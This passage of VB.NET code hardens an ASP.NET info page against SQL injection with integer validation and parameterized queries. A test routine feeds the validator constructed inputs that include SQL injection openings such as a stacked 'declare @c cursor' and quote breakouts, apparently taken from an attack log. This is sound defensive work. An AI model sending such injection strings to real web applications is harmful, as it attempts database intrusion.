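        Return Integer.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, infoId)
    End Function

    ' AFTER: the SQL text is a constant; the value travels separately as a
    ' typed parameter and is never parsed as SQL.
    Public Function LoadInfo(ByVal connectionString As String, ByVal infoId As Integer) As DataTable
        Const sql As String = "SELECT Title, Body FROM Info WHERE InfoId = @infoId"
        Dim result As New DataTable()
        Using conn As New SqlConnection(connectionString)
            Using cmd As New SqlCommand(sql, conn)
                cmd.Parameters.Add("@infoId", SqlDbType.Int).Value = infoId
                conn.Open()
                Using reader As SqlDataReader = cmd.ExecuteReader()
                    result.Load(reader)
                End Using
            End Using
        End Using
        Return result
    End Function

    ' Header values are client-controlled as well. If the site stores them
    ' (an assumption), they are bound as parameters with a length limit.
    Public Sub LogVisit(ByVal connectionString As String, ByVal infoId As Integer,
                        ByVal userAgent As String, ByVal referer As String)
        Const sql As String =
            "INSERT INTO VisitLog (InfoId, UserAgent, Referer) VALUES (@infoId, @ua, @ref)"
        Using conn As New SqlConnection(connectionString)
            Using cmd As New SqlCommand(sql, conn)
                cmd.Parameters.Add("@infoId", SqlDbType.Int).Value = infoId
                cmd.Parameters.Add("@ua", SqlDbType.NVarChar, 512).Value = Limit(userAgent, 512)
                cmd.Parameters.Add("@ref", SqlDbType.NVarChar, 2048).Value = Limit(referer, 2048)
                conn.Open()
                cmd.ExecuteNonQuery()
            End Using
        End Using
    End Sub

    ' Nothing becomes NULL; longer strings are cut to the column size.
    Private Function Limit(ByVal value As String, ByVal maxLength As Integer) As Object
        If value Is Nothing Then Return DBNull.Value
        If value.Length > maxLength Then Return value.Substring(0, maxLength)
        Return value
    End Function

    ' Offline check of the validation step. The inputs are constructed: a
    ' normal id and the openings of the infoid values from the log above.
    Public Sub Main()
        Dim samples As String() = {"20", "20;declare @c cursor", "20)", "20'", "20')", ""}
        For Each s As String In samples
            Dim id As Integer
            Console.WriteLine("{0,-24} accepted={1}", s, TryParseInfoId(s, id))
        Next
    End Sub

    ' Use in the page (code-behind of info.aspx, connStr is an assumption):
    '   Dim id As Integer
    '   If Not InfoQueries.TryParseInfoId(Request.QueryString("infoid"), id) Then
    '       Response.StatusCode = 400
    '       Response.End()
    '   End If
    '   Dim data As DataTable = InfoQueries.LoadInfo(connStr, id)
End Module
```

Only "20" passes the validation step; every other sample is rejected before a connection is opened.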
 